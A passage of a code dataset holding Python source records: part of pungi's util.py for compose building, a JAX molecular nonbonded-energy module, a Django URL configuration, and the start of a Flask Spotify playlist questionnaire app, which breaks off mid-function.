lines[0].split()[0]\n\n\ndef resolve_git_url(url):\n \"\"\"Given a url to a Git repo specifying HEAD or origin/ as a ref,\n replace that specifier with actual SHA1 of the commit.\n\n Otherwise, the original URL will be returned.\n\n Raises RuntimeError if there was an error. Most likely cause is failure to\n run git command.\n \"\"\"\n r = urllib.parse.urlsplit(url)\n ref = _get_git_ref(r.fragment)\n if not ref:\n return url\n\n # Remove git+ prefix from scheme if present. This is for resolving only,\n # the final result must use original scheme.\n scheme = r.scheme.replace(\"git+\", \"\")\n\n baseurl = urllib.parse.urlunsplit((scheme, r.netloc, r.path, \"\", \"\"))\n fragment = resolve_git_ref(baseurl, ref)\n\n result = urllib.parse.urlunsplit((r.scheme, r.netloc, r.path, r.query, fragment))\n if \"?#\" in url:\n # The urllib library drops empty query string. This hack puts it back in.\n result = result.replace(\"#\", \"?#\")\n return result\n\n\nclass GitUrlResolver(object):\n \"\"\"A caching resolver for git references. As input it can either take repo\n URL with fragment describing reference, or url and refname. It will return\n either url with changed fragment or just resolved ref.\n \"\"\"\n\n def __init__(self, offline=False):\n self.offline = offline\n self.cache = {}\n\n def __call__(self, url, branch=None):\n if self.offline:\n return branch or url\n key = (url, branch)\n if key not in self.cache:\n try:\n res = resolve_git_ref(url, branch) if branch else resolve_git_url(url)\n self.cache[key] = res\n except GitUrlResolveError as exc:\n self.cache[key] = exc\n if isinstance(self.cache[key], GitUrlResolveError):\n raise self.cache[key]\n return self.cache[key]\n\n\n# format: {arch|*: [data]}\ndef get_arch_data(conf, var_name, arch):\n result = []\n for conf_arch, conf_data in conf.get(var_name, {}).items():\n if conf_arch != \"*\" and conf_arch != arch:\n continue\n if conf_arch == \"*\" and arch == \"src\":\n # src is excluded from '*' and needs to be explicitly added to the mapping\n continue\n if isinstance(conf_data, list):\n result.extend(conf_data)\n else:\n result.append(conf_data)\n return result\n\n\ndef get_variant_data(conf, var_name, variant, keys=None):\n \"\"\"Get configuration for variant.\n\n Expected config format is a mapping from variant_uid regexes to lists of\n values.\n\n :param var_name: name of configuration key with which to work\n :param variant: Variant object for which to get configuration\n :param keys: A set to which a used pattern from config will be added (optional)\n :rtype: a list of values\n \"\"\"\n result = []\n for conf_variant, conf_data in conf.get(var_name, {}).items():\n if not re.match(conf_variant, variant.uid):\n continue\n if keys is not None:\n keys.add(conf_variant)\n if isinstance(conf_data, list):\n result.extend(conf_data)\n else:\n result.append(conf_data)\n return result\n\n\ndef _apply_substitutions(compose, volid):\n substitutions = compose.conf[\"volume_id_substitutions\"].items()\n # processing should start with the longest pattern, otherwise, we could\n # unexpectedly replace a substring of that longest pattern\n for k, v in sorted(substitutions, key=lambda x: len(x[0]), reverse=True):\n volid = volid.replace(k, v)\n return volid\n\n\ndef get_volid(compose, arch, variant=None, disc_type=False, formats=None, **kwargs):\n \"\"\"Get ISO volume ID for arch and variant\"\"\"\n if variant and variant.type == \"addon\":\n # addons are part of parent variant media\n return None\n\n if variant and variant.type == \"layered-product\":\n release_short = variant.release_short\n release_version = variant.release_version\n release_is_layered = True\n base_product_short = compose.conf[\"release_short\"]\n base_product_version = get_major_version(compose.conf[\"release_version\"])\n variant_uid = variant.parent.uid\n else:\n release_short = compose.conf[\"release_short\"]\n release_version = compose.conf[\"release_version\"]\n release_is_layered = (\n True if compose.conf.get(\"base_product_name\", \"\") else False\n )\n base_product_short = compose.conf.get(\"base_product_short\", \"\")\n base_product_version = compose.conf.get(\"base_product_version\", \"\")\n variant_uid = variant and variant.uid or None\n\n products = compose.conf[\"image_volid_formats\"]\n layered_products = compose.conf[\"image_volid_layered_product_formats\"]\n\n volid = None\n if release_is_layered:\n all_products = layered_products + products\n else:\n all_products = products\n formats = formats or all_products\n\n tried = set()\n for i in formats:\n if not variant_uid and \"%(variant)s\" in i:\n continue\n try:\n args = get_format_substs(\n compose,\n variant=variant_uid,\n release_short=release_short,\n version=release_version,\n arch=arch,\n disc_type=disc_type or \"\",\n base_product_short=base_product_short,\n base_product_version=base_product_version,\n **kwargs\n )\n volid = (i % args).format(**args)\n except KeyError as err:\n raise RuntimeError(\n \"Failed to create volume id: unknown format element: %s\" % err\n )\n volid = _apply_substitutions(compose, volid)\n if len(volid) <= 32:\n break\n tried.add(volid)\n\n if volid and len(volid) > 32:\n raise ValueError(\n \"Could not create volume ID longer than 32 bytes, options are %r\",\n sorted(tried, key=len),\n )\n\n if compose.conf[\"restricted_volid\"]:\n # Replace all non-alphanumeric characters and non-underscores) with\n # dashes.\n volid = re.sub(r\"\\W\", \"-\", volid)\n\n return volid\n\n\ndef get_mtime(path):\n return int(os.stat(path).st_mtime)\n\n\ndef get_file_size(path):\n return os.path.getsize(path)\n\n\ndef find_old_compose(\n old_compose_dirs,\n release_short,\n release_version,\n release_type_suffix,\n base_product_short=None,\n base_product_version=None,\n allowed_statuses=None,\n):\n allowed_statuses = allowed_statuses or (\"FINISHED\", \"FINISHED_INCOMPLETE\", \"DOOMED\")\n composes = []\n\n def _sortable(compose_id):\n \"\"\"Convert ID to tuple where respin is an integer for proper sorting.\"\"\"\n try:\n prefix, respin = compose_id.rsplit(\".\", 1)\n return (prefix, int(respin))\n except Exception:\n return compose_id\n\n for compose_dir in force_list(old_compose_dirs):\n if not os.path.isdir(compose_dir):\n continue\n\n # get all finished composes\n for i in os.listdir(compose_dir):\n # TODO: read .composeinfo\n\n pattern = \"%s-%s%s\" % (release_short, release_version, release_type_suffix)\n if base_product_short:\n pattern += \"-%s\" % base_product_short\n if base_product_version:\n pattern += \"-%s\" % base_product_version\n\n if not i.startswith(pattern):\n continue\n\n suffix = i[len(pattern) :]\n if len(suffix) < 2 or not suffix[1].isdigit():\n # This covers the case where we are looking for -updates, but there\n # is an updates-testing as well.\n continue\n\n path = os.path.join(compose_dir, i)\n if not os.path.isdir(path):\n continue\n\n status_path = os.path.join(path, \"STATUS\")\n if not os.path.isfile(status_path):\n continue\n\n try:\n with open(status_path, \"r\") as f:\n if f.read().strip() in allowed_statuses:\n composes.append((_sortable(i), os.path.abspath(path)))\n except Exception:\n continue\n\n if not composes:\n return None\n\n return sorted(composes)[-1][1]\n\n\ndef process_args(fmt, args):\n \"\"\"Given a list of arguments, format each value with the format string.\n\n >>> process_args('--opt=%s', ['foo', 'bar'])\n ['--opt=foo', '--opt=bar']\n \"\"\"\n return [fmt % val for val in force_list(args or [])]\n\n\n@contextlib.contextmanager\ndef failable(\n compose, can_fail, variant, arch, deliverable, subvariant=None, logger=None\n):\n \"\"\"If a deliverable can fail, log a message and go on as if it succeeded.\"\"\"\n if not logger:\n logger = compose._logger\n if can_fail:\n compose.attempt_deliverable(variant, arch, deliverable, subvariant)\n else:\n compose.require_deliverable(variant, arch, deliverable, subvariant)\n try:\n yield\n except Exception as exc:\n if not can_fail:\n raise\n else:\n log_failed_task(\n compose, variant, arch, deliverable, subvariant, logger=logger, exc=exc\n )\n\n\ndef log_failed_task(\n compose, variant, arch, deliverable, subvariant, logger=None, exc=None\n):\n logger = logger or compose._logger\n msg = deliverable.replace(\"-\", \" \").capitalize()\n compose.fail_deliverable(variant, arch, deliverable, subvariant)\n ident = \"variant %s, arch %s\" % (variant.uid if variant else \"None\", arch)\n if subvariant:\n ident += \", subvariant %s\" % subvariant\n logger.error(\"[FAIL] %s (%s) failed, but going on anyway.\" % (msg, ident))\n if exc:\n logger.error(str(exc))\n tb = traceback.format_exc()\n logger.debug(tb)\n\n\ndef can_arch_fail(failable_arches, arch):\n \"\"\"Check if `arch` is in `failable_arches` or `*` can fail.\"\"\"\n return \"*\" in failable_arches or arch in failable_arches\n\n\ndef get_format_substs(compose, **kwargs):\n \"\"\"Return a dict of basic format substitutions.\n\n Any kwargs will be added as well.\n \"\"\"\n substs = {\n \"compose_id\": compose.compose_id,\n \"release_short\": compose.ci_base.release.short,\n \"version\": compose.ci_base.release.version,\n \"date\": compose.compose_date,\n \"respin\": compose.compose_respin,\n \"type\": compose.compose_type,\n \"type_suffix\": compose.compose_type_suffix,\n \"label\": compose.compose_label,\n \"label_major_version\": compose.compose_label_major_version,\n }\n substs.update(kwargs)\n return substs\n\n\ndef copy_all(src, dest):\n \"\"\"\n Copy all files and directories within ``src`` to the ``dest`` directory.\n\n This is equivalent to running ``cp -r src/* dest``.\n\n :param src:\n Source directory to copy from.\n\n :param dest:\n Destination directory to copy to.\n\n :return:\n A list of relative paths to the files copied.\n\n Example:\n >>> _copy_all('/tmp/src/', '/tmp/dest/')\n ['file1', 'dir1/file2', 'dir1/subdir/file3']\n \"\"\"\n contents = os.listdir(src)\n if not contents:\n raise RuntimeError(\"Source directory %s is empty.\" % src)\n makedirs(dest)\n for item in contents:\n source = os.path.join(src, item)\n destination = os.path.join(dest, item)\n if os.path.isdir(source):\n shutil.copytree(source, destination)\n else:\n if os.path.islink(source):\n # It's a symlink, we should preserve it instead of resolving.\n os.symlink(os.readlink(source), destination)\n else:\n shutil.copy2(source, destination)\n\n return recursive_file_list(src)\n\n\ndef move_all(src, dest, rm_src_dir=False):\n \"\"\"\n Copy all files and directories within ``src`` to the ``dest`` directory.\n\n This is equivalent to running ``mv src/* dest``.\n\n :param src:\n Source directory to move from.\n\n :param dest:\n Destination directory to move to.\n\n :param rm_src_dir:\n If True, the `src` directory is removed once its content is moved.\n \"\"\"\n contents = os.listdir(src)\n if not contents:\n raise RuntimeError(\"Source directory %s is empty.\" % src)\n makedirs(dest)\n for item in contents:\n source = os.path.join(src, item)\n destination = os.path.join(dest, item)\n shutil.move(source, destination)\n\n if rm_src_dir:\n os.rmdir(src)\n\n\ndef recursive_file_list(directory):\n \"\"\"Return a list of files contained in ``directory``.\n\n The files are paths relative to ``directory``\n\n :param directory:\n Path to the directory to list.\n\n Example:\n >>> recursive_file_list('/some/dir')\n ['file1', 'subdir/file2']\n \"\"\"\n file_list = []\n for root, dirs, files in os.walk(directory):\n file_list += [os.path.relpath(os.path.join(root, f), directory) for f in files]\n return file_list\n\n\ndef levenshtein(a, b):\n \"\"\"Compute Levenshtein edit distance between two strings.\"\"\"\n mat = [[0 for _ in range(len(a) + 1)] for _ in range(len(b) + 1)]\n\n for i in range(len(a) + 1):\n mat[0][i] = i\n\n for j in range(len(b) + 1):\n mat[j][0] = j\n\n for j in range(1, len(b) + 1):\n for i in range(1, len(a) + 1):\n cost = 0 if a[i - 1] == b[j - 1] else 1\n mat[j][i] = min(\n mat[j - 1][i] + 1, mat[j][i - 1] + 1, mat[j - 1][i - 1] + cost\n )\n\n return mat[len(b)][len(a)]\n\n\n@contextlib.contextmanager\ndef temp_dir(log=None, *args, **kwargs):\n \"\"\"Create a temporary directory and ensure it's deleted.\"\"\"\n if kwargs.get(\"dir\"):\n # If we are supposed to create the temp dir in a particular location,\n # ensure the location already exists.\n makedirs(kwargs[\"dir\"])\n dir = tempfile.mkdtemp(*args, **kwargs)\n try:\n yield dir\n finally:\n try:\n shutil.rmtree(dir)\n except OSError as exc:\n # Okay, we failed to delete temporary dir.\n if log:\n log.warning(\"Error removing %s: %s\", dir, exc.strerror)\n\n\ndef run_unmount_cmd(cmd, max_retries=10, path=None, logger=None):\n \"\"\"Attempt to run the command to unmount an image.\n\n If the command fails and stderr complains about device being busy, try\n again. We will do up to ``max_retries`` attempts with increasing pauses.\n\n If both path and logger are specified, more debugging information will be\n printed in case of failure.\n \"\"\"\n for i in range(max_retries):\n proc = subprocess.Popen(\n cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE, universal_newlines=True\n )\n out, err = proc.communicate()\n if proc.returncode == 0:\n # We were successful\n return\n if \"Device or resource busy\" not in err:\n raise RuntimeError(\"Unhandled error when running %r: %r\" % (cmd, err))\n time.sleep(i)\n # Still busy, there's something wrong.\n if path and logger:\n commands = [\n [\"ls\", \"-lA\", path],\n [\"fuser\", \"-vm\", path],\n [\"lsof\", \"+D\", path],\n ]\n for c in commands:\n try:\n proc = subprocess.Popen(\n c,\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n universal_newlines=True,\n )\n out, _ = proc.communicate()\n logger.debug(\n \"`%s` exited with %s and following output:\\n%s\",\n \" \".join(c),\n proc.returncode,\n out,\n )\n except OSError:\n logger.debug(\"`%s` command not available for debugging\", \" \".join(c))\n raise RuntimeError(\"Failed to run %r: Device or resource busy.\" % cmd)\n\n\ndef translate_path_raw(mapping, path):\n normpath = os.path.normpath(path)\n for prefix, newvalue in mapping:\n prefix = os.path.normpath(prefix)\n # Strip trailing slashes: the prefix has them stripped by `normpath`.\n newvalue = newvalue.rstrip(\"/\")\n if normpath.startswith(prefix):\n # We can't call os.path.normpath on result since it is not actually\n # a path - http:// would get changed to http:/ and so on.\n # Only the first occurrence should be replaced.\n return normpath.replace(prefix, newvalue, 1)\n return normpath\n\n\ndef translate_path(compose, path):\n \"\"\"\n @param compose - required for access to config\n @param path\n \"\"\"\n mapping = compose.conf[\"translate_paths\"]\n return translate_path_raw(mapping, path)\n\n\ndef get_repo_url(compose, repo, arch=\"$basearch\"):\n \"\"\"\n Convert repo to repo URL.\n\n @param compose - required for access to variants\n special value compose==None determines that method is called during\n OSTreeInstaller phase where variant-type source repository is deprecated\n @param repo - string or a dict which at least contains 'baseurl' key\n @param arch - string to be used as arch in repo url\n \"\"\"\n if isinstance(repo, dict):\n try:\n repo = repo[\"baseurl\"]\n except KeyError:\n raise RuntimeError(\"Baseurl is required in repo dict %s\" % str(repo))\n if repo.startswith(\"/\"):\n # It's an absolute path, translate it and return it\n return translate_path(compose, repo)\n if \"://\" not in repo:\n # this is a variant name\n if compose is not None:\n v = compose.all_variants.get(repo)\n if not v:\n raise RuntimeError(\"There is no variant %s to get repo from.\" % repo)\n else:\n return None\n repo = translate_path(\n compose, compose.paths.compose.repository(arch, v, create_dir=False)\n )\n return repo\n\n\ndef get_repo_urls(compose, repos, arch=\"$basearch\", logger=None):\n \"\"\"\n Convert repos to a list of repo URLs.\n\n @param compose - required for access to variants\n @param repos - list of string or dict, if item is a dict, key 'baseurl' is required\n @param arch - string to be used as arch in repo url\n \"\"\"\n urls = []\n for repo in repos:\n repo = get_repo_url(compose, repo, arch=arch)\n if repo is None:\n if logger:\n logger.log_warning(\n \"Variant-type source repository is deprecated and will \"\n \"be ignored during 'OSTreeInstaller' phase: %s\" % (repo)\n )\n else:\n urls.append(repo)\n return urls\n\n\ndef _translate_url_to_repo_id(url):\n \"\"\"\n Translate url to valid repo id by replacing any invalid char to '_'.\n \"\"\"\n _REPOID_CHARS = string.ascii_letters + string.digits + \"-_.:\"\n return \"\".join([s if s in list(_REPOID_CHARS) else \"_\" for s in url])\n\n\ndef get_repo_dict(repo):\n \"\"\"\n Convert repo to a dict of repo options.\n\n If repo is a string that represents url, set it as 'baseurl' in result dict,\n also generate a repo id/name as 'name' key in result dict.\n If repo is a dict, and if 'name' key is missing in the dict, generate one for it.\n Repo (str or dict) that has not url format is no longer processed.\n\n @param repo - A string or dict, if it is a dict, key 'baseurl' is required\n \"\"\"\n repo_dict = {}\n if isinstance(repo, dict):\n url = repo[\"baseurl\"]\n name = repo.get(\"name\", None)\n if \"://\" in url:\n if name is None:\n name = _translate_url_to_repo_id(url)\n else:\n # url is variant uid - this possibility is now discontinued\n return {}\n repo[\"name\"] = name\n repo[\"baseurl\"] = url\n return repo\n else:\n # repo is normal url or variant uid\n repo_dict = {}\n if \"://\" in repo:\n repo_dict[\"name\"] = _translate_url_to_repo_id(repo)\n repo_dict[\"baseurl\"] = repo\n else:\n return {}\n return repo_dict\n\n\ndef get_repo_dicts(repos, logger=None):\n \"\"\"\n Convert repos to a list of repo dicts.\n\n @param repo - A list of string or dict, if item is a dict, key 'baseurl' is required\n \"\"\"\n repo_dicts = []\n for repo in repos:\n repo_dict = get_repo_dict(repo)\n if repo_dict == {}:\n if logger:\n logger.log_warning(\n \"Variant-type source repository is deprecated and will \"\n \"be ignored during 'OSTree' phase: %s\" % (repo)\n )\n else:\n repo_dicts.append(repo_dict)\n return repo_dicts\n\n\ndef version_generator(compose, gen):\n \"\"\"If ``gen`` is a known generator, create a value. Otherwise return\n the argument value unchanged.\n \"\"\"\n if gen == \"!OSTREE_VERSION_FROM_LABEL_DATE_TYPE_RESPIN\":\n return \"%s.%s\" % (compose.image_version, compose.image_release)\n elif gen == \"!RELEASE_FROM_LABEL_DATE_TYPE_RESPIN\":\n return compose.image_release\n elif gen == \"!RELEASE_FROM_DATE_RESPIN\":\n return \"%s.%s\" % (compose.compose_date, compose.compose_respin)\n elif gen == \"!VERSION_FROM_VERSION_DATE_RESPIN\":\n return \"%s.%s.%s\" % (\n compose.ci_base.release.version,\n compose.compose_date,\n compose.compose_respin,\n )\n elif gen == \"!VERSION_FROM_VERSION\":\n return \"%s\" % (compose.ci_base.release.version)\n elif gen and gen[0] == \"!\":\n raise RuntimeError(\"Unknown version generator '%s'\" % gen)\n return gen\n\n\ndef retry(timeout=120, interval=30, wait_on=Exception):\n \"\"\"A decorator that allows to retry a section of code until success or\n timeout.\n \"\"\"\n\n def wrapper(function):\n @functools.wraps(function)\n def inner(*args, **kwargs):\n start = time.time()\n while True:\n try:\n return function(*args, **kwargs)\n except wait_on:\n if (time.time() - start) >= timeout:\n raise # This re-raises the last exception.\n time.sleep(interval)\n\n return inner\n\n return wrapper\n\n\n@retry(wait_on=RuntimeError)\ndef git_ls_remote(baseurl, ref):\n return run([\"git\", \"ls-remote\", baseurl, ref], universal_newlines=True)\n\n\ndef get_tz_offset():\n \"\"\"Return a string describing current local timezone offset.\"\"\"\n is_dst = time.daylight and time.localtime().tm_isdst > 0\n # We need to negate the value: the values are in seconds west of UTC, but\n # ISO 8601 wants the offset to be negative for times behind UTC (i.e. to\n # the west).\n offset = -(time.altzone if is_dst else time.timezone)\n hours = offset / 3600\n minutes = (offset / 60) % 60\n return \"%+03d:%02d\" % (hours, minutes)\n\n\ndef parse_koji_event(event):\n \"\"\"Process event specification. If event looks like a number, it will be\n used as is. If a string is given, it will be interpreted as a path to the\n topdir of another compose, from which an even it will be extracted.\n \"\"\"\n try:\n return int(event)\n except ValueError:\n pass\n try:\n with open(os.path.join(event, \"work/global/koji-event\")) as f:\n return json.load(f)[\"id\"]\n except (IOError, OSError, KeyError):\n raise argparse.ArgumentTypeError(\n \"%s is not a number or path to compose with valid Koji event\" % event\n )\n\n\ndef load_config(file_path, defaults={}):\n \"\"\"Open and load configuration file form .conf or .json file.\"\"\"\n conf = kobo.conf.PyConfigParser()\n conf.load_from_dict(defaults)\n if file_path.endswith(\".json\"):\n with open(file_path) as f:\n conf.load_from_dict(json.load(f))\n conf.opened_files = [file_path]\n conf._open_file = file_path\n else:\n conf.load_from_file(file_path)\n\n return conf\n\n\ndef _read_single_module_stream(\n file_or_string, compose=None, arch=None, build=None, is_file=True\n):\n try:\n mod_index = Modulemd.ModuleIndex.new()\n if is_file:\n mod_index.update_from_file(file_or_string, True)\n else:\n mod_index.update_from_string(file_or_string, True)\n mod_names = mod_index.get_module_names()\n emit_warning = False\n if len(mod_names) > 1:\n emit_warning = True\n mod_streams = mod_index.get_module(mod_names[0]).get_all_streams()\n if len(mod_streams) > 1:\n emit_warning = True\n if emit_warning and compose:\n compose.log_warning(\n \"Multiple modules/streams for arch: %s. Build: %s. \"\n \"Processing first module/stream only.\",\n arch,\n build,\n )\n return mod_streams[0]\n except (KeyError, IndexError):\n # There is no modulemd for this arch. This could mean an arch was\n # added to the compose after the module was built. We don't want to\n # process this, let's skip this module.\n if compose:\n compose.log_info(\"Skipping arch: %s. Build: %s\", arch, build)\n\n\ndef read_single_module_stream_from_file(*args, **kwargs):\n return _read_single_module_stream(*args, is_file=True, **kwargs)\n\n\ndef read_single_module_stream_from_string(*args, **kwargs):\n return _read_single_module_stream(*args, is_file=False, **kwargs)\n\n\n@contextlib.contextmanager\ndef as_local_file(url):\n \"\"\"If URL points to a file over HTTP, the file will be downloaded locally\n and a path to the local copy is yielded. For local files the original path\n is returned.\n \"\"\"\n if url.startswith(\"http://\") or url.startswith(\"https://\"):\n local_filename, _ = urllib.request.urlretrieve(url)\n try:\n yield local_filename\n finally:\n os.remove(local_filename)\n elif url.startswith(\"file://\"):\n yield url[7:]\n else:\n # Not a remote url, return unchanged.\n yield url\n\n\nclass PartialFuncWorkerThread(WorkerThread):\n \"\"\"\n Worker thread executing partial_func and storing results\n in the PartialFuncThreadPool.\n \"\"\"\n\n def process(self, partial_func, num):\n self.pool._results.append(partial_func())\n\n\nclass PartialFuncThreadPool(ThreadPool):\n \"\"\"\n Thread pool for PartialFuncWorkerThread threads.\n\n Example:\n\n # Execute `pow` in one thread and print result.\n pool = PartialFuncThreadPool()\n pool.add(PartialFuncWorkerThread(pool))\n pool.queue_put(functools.partial(pow, 323, 1235))\n pool.start()\n pool.stop()\n print(pool.results)\n \"\"\"\n\n def __init__(self, logger=None):\n ThreadPool.__init__(self, logger)\n self._results = []\n\n @property\n def results(self):\n return self._results\n\n\ndef read_json_file(file_path):\n \"\"\"A helper function to read a JSON file.\"\"\"\n with open(file_path) as f:\n return json.load(f)\n","repo_name":"yifengyou/pungi","sub_path":"BUILD/pungi-4.3.6/pungi/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":36193,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"36138762732","text":"from scipy import constants as const\nfrom math import pi\nfrom jax import vmap,jit,grad,jacfwd,lax\nimport jax.numpy as jnp\nimport numpy as np\nfrom delff.objects import *\nfrom delff.rtp import xyz2rtp,xyz2rtp_lattice\nfrom delff.nonbonding_energy import nonbond_energy_intramol_correction, charmm_Sfactor, calc_coulomb, calc_vdw\n\n\n@jit\ndef nonbond_energy_neighbors(ff_ : ForceField,\n rtp_: RTPCoord,\n ffa_: ForceFieldAssignments, \n rtp_lat: RTPCoord) -> f64:\n \"\"\"\n Calculates the non-bonded energy between neighboring atoms, taking into account both external and internal interactions.\n\n Arguments:\n ff_ (ForceField): ForceField object containing the parameters for the force field.\n rtp_ (RTPCoord): RTPCoord object containing the coordinates in RTP format.\n ffa_ (ForceFieldAssignments): ForceFieldAssignments object containing the force field assignments for each atom in the system.\n rtp_lat (RTPCoord): RTPCoord object containing the lattice coordinates in RTP format.\n\n Returns:\n tuple: Tuple containing the Coulomb and van der Waals energies of the system.\n \"\"\"\n\n cea_ex, vea_ex = nonbond_energy_allneighbors(ff_,rtp_lat,ffa_) \n cets,vets = nonbond_energy_intramol_correction(ff_,rtp_,ffa_)\n return cea_ex-cets, vea_ex-vets\n\n\n@jit\ndef nonbond_energy_allneighbors(ff_ : ForceField,\n rtp_: RTPCoord, # must be neghbors list type \n ffa_: ForceFieldAssignments # must include a neighbors-property \n ) -> f64:\n \"\"\"\n Calculates the non-bonded energy of all neighbor interactions in the system.\n\n Arguments:\n ff_ (ForceField): ForceField object containing the parameters for the force field.\n rtp_ (RTPCoord): RTPCoord object containing the coordinates in RTP format.\n ffa_ (ForceFieldAssignments): ForceFieldAssignments object containing the force field assignments for each atom in the system.\n\n Returns:\n tuple: Tuple containing the Coulomb and van der Waals energies of all neighbor interactions in the system.\n \"\"\"\n\n def calc_coulomb_neighbors(r,neighbors_each,atomtypes,charges,dielectric_constant,ccutoff):\n\n ccoeff = jnp.where(jnp.sum(jnp.abs(neighbors_each[2:5]))==0,1,0.5)\n return calc_coulomb(r,atomtypes[neighbors_each[1]],atomtypes[neighbors_each[6]],\\\n charges,dielectric_constant,ccoeff,ccutoff)\n\n v1cnei = vmap(calc_coulomb_neighbors,( 0, 0,None,None,None,None),0) \n coulomb_energy_allpairs = v1cnei(rtp_.rall,ffa_.neighbors,ffa_.atomtypes,ff_.charges,ff_.dielectric_constant,ffa_.ccutoff)\n coulomb_energy_all = jnp.sum(jnp.sum(jnp.sum(jnp.sum(coulomb_energy_allpairs))))\n\n\n def calc_vdw_neighbors(r,neighbors_each,atomtypes,pairs,vcutoff):\n vcoeff = jnp.where(jnp.sum(jnp.abs(neighbors_each[2:5]))==0,1,0.5)\n return calc_vdw(r,atomtypes[neighbors_each[1]],atomtypes[neighbors_each[6]],pairs,vcoeff,vcutoff)\n\n v1vnei = vmap(calc_vdw_neighbors,( 0, 0,None,None,None),0) \n vdw_energy_allpairs = v1vnei(rtp_.rall,ffa_.neighbors,ffa_.atomtypes,ff_.pairs,ffa_.vcutoff)\n vdw_energy_all = jnp.sum(jnp.sum(jnp.sum(jnp.sum(vdw_energy_allpairs))))\n\n return coulomb_energy_all, vdw_energy_all \n\n","repo_name":"n-hiroshi/delff","sub_path":"delff/nonbonding_energy_neighbors.py","file_name":"nonbonding_energy_neighbors.py","file_ext":"py","file_size_in_byte":3355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31466832525","text":"from django.conf.urls import patterns, include, url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^get-company/$', views.companyIndex, name='companyIndex'),\n url(r'^company-status/$', views.companyStatus, name='companyStatus'),\n url(r'^edit-company/$', views.company_edit, name='company_edit'),\n url(r'^company-licenses/$', views.company_licenses, name='company_licenses'),\n url(r'^company-licenses-update/$', views.update_company_licenses, name='update_company_licenses'),\n url(r'^company-dashboard/$', views.company_dashboards, name='company_dashboards'),\n url(r'^company-dashboard-update/$', views.update_company_dashboard, name='update_company_dashboard'),\n]\n","repo_name":"developer-ramesh/adv","sub_path":"companymanagement/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8026194042","text":"# CS1520\n# Group 3 Project\n\nfrom flask import Flask, render_template, request, redirect, session, make_response, jsonify\nimport spotipy\nimport os\nimport json \n\nfrom spotipy.oauth2 import SpotifyClientCredentials, SpotifyOAuth\nfrom dotenv import load_dotenv\nfrom google.cloud import datastore\nimport random\nfrom logins import get_salt, get_hashed_password, create_new_user, is_unique_username, check_password, is_unique_email, get_signed_url\n\napp = Flask(__name__)\napp.secret_key = '2\\xe4\\xf35\\xda\\xabv^ \\xeaKt'\n\nload_dotenv()\ndatastore_client = datastore.Client()\nauth = False\n\n# Spotify Authentication\nclient_credentials_manager = SpotifyClientCredentials()\nspAuth = SpotifyOAuth(cache_path=\".spotifycache\", scope=\"playlist-modify-public\")\nsp = spotipy.Spotify(client_credentials_manager=client_credentials_manager)\n\n# Quiz questions\nquestions = {\n \"What is your favorite genre of music?\": ['rock', 'pop', 'country', 'hip-hop', 'r-n-b', 'indie', 'techno', 'jazz', 'afrobeat', 'soul', 'gospel'],\n \"How many songs should be in the finished playlist?\": [10, 20, 30, 40],\n \"Which of these artists would you be most likely to listen to?\": ['The Beatles', 'Taylor Swift', 'The Chicks', 'Eminem', 'Beyonce', 'Coldplay', 'Daft Punk', 'Kamasi Washington', 'Wizkid', 'Janelle Monae', 'Kirk Franklin'],\n \"Based on artist selected would you like for the playlist to have related artists included?\": ['Yes', 'No'], \n}\n\n@app.route(\"/\")\ndef home():\n user = get_user()\n if user is None:\n return render_template(\"index.html\", auth=False)\n else:\n return render_template(\"index.html\", auth=True, user=user)\n\n@app.route(\"/questionnaire\")\ndef questionnaire():\n user = get_user()\n if user is None:\n return redirect(\"/login\")\n else:\n return render_template(\"questionnaire.html\", questions=questions, auth=True, user=user)\n\n@app.route(\"/quizoutput\", methods=['POST'])\ndef quizoutput():\n answerlist = []\n for i in questions.keys():\n answered = request.form[i]\n # print(answered)\n answerlist.append(answered)\n return playlist(quiz_answers=answerlist)\n\n@app.route(\"/playlist\")\ndef playlist(*args, **kwargs):\n quiz_answers = kwargs.get('quiz_answers', [])\n try:\n num_songs = int(quiz_answers[1])\n except:\n num_songs = 10\n\n try:\n genres = [quiz_answers[0]]\n # print (\"genres = \" + str(genres))\n except:\n genres = ['hip-hop']\n\n try:\n artist = quiz_answers[2]\n artist_top_track = find_artist_top_tracks(artist, country=\"US\")\n except:\n artist_top_track = None\n\n related_artist_tracks = find_related_artist_tracks(artist, quiz_answers[3])\n\n # Set up recommended playlist & find ideal song proportion\n recommended_playlist = []\n proportion = int(num_songs*.2)\n num_songs = num_songs - proportion\n\n # Add related artist tracks\n if related_artist_tracks:\n add_songs_from_json(related_artist_tracks, proportion, recommended_playlist)\n num_songs = num_songs - proportion\n\n # Add artist top tracks\n add_songs_from_json(artist_top_track, proportion, recommended_playlist)\n\n # Add recommended tracks\n recommended_songs = sp.recommendations(None, genres, None, num_songs)\n add_songs_from_json(recommended_songs, num_songs, recommended_playlist)\n random.shuffle(recommended_playlist)\n return render_template(\"playlist.html\", playlist=recommended_playlist, json_playlist=json.dumps(recommended_playlist), auth=True, user=get_user())\n\n# Get artist id from string of artist's name\ndef find_artist_id(artist):\n switch = {\n 'The Beatles': '3WrFJ7ztbogyGnTHbHJFl2',\n 'Taylor Swift': '06HL4z0CvFAxyc27GXpf02',\n 'The Chicks': '25IG9fa7cbdmCIy3OnuH57',\n 'Eminem': '7dGJo4pcD2V6oG8kP0tJRR',\n 'Beyonce': '6vWDO969PvNqNYHIOW5v0m',\n 'Coldplay': '4gzpq5DPGxSnKTe4SA8HAU', \n 'Daft Punk': '4tZwfgrHOc3mvqYlEYSvVi',\n 'Kamasi Washington': '6HQYnRM4OzToCYPpVBInuU',\n 'Wizkid': '3tVQdUvClmAT7URs9V3rsp',\n 'Janelle Monae': '6ueGR6SWhUJfvEhqkvMsVs',\n 'Kirk Franklin': '4akybxRTGHJZ1DXjLhJ1qu',\n }\n return switch.get(artist, None)\n\n# Get top tracks from related artists if user wants them included\ndef find_related_artist_tracks(artist, related_yn):\n # Check if user's answer is yes for if they want tracks from related artists \n if related_yn=='Yes':\n # Get id for the artist\n artist_id = find_artist_id(artist)\n # Spotipy function for get related artists\n related_artists = sp.artist_related_artists(artist_id)\n 